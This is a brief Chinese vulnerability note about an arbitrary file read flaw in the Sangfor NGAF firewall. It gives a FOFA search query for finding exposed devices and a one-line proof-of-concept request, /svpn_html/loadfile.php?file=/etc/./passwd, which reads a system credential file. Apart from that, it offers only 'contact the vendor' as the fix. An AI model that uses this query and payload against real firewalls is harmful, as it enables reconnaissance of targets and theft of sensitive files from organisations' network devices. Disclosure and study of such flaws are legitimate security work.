Nx01 产品简介
深信服下一代防火墙NGAF专注网络边界安全效果,通过应用丰富的安全创新防御技术和简单易用的产品设计理念,不仅增强网络边界的安全检测与防控能力,而且实现网络安全风险可视化展示与快速处置,让组织网络边界安全建设更有效、更简单。
Nx02 漏洞描述
深信服下一代防火墙NGAF存在任意文件读取漏洞,攻击者可以利用该漏洞获取敏感信息。
Nx03 产品主页
fofa-query: web.title=="SANGFOR | NGAF"
Nx04 漏洞复现
POC:
/svpn_html/loadfile.php?file=/etc/./passwd
Nx05 修复建议
建议联系软件厂商进行处理。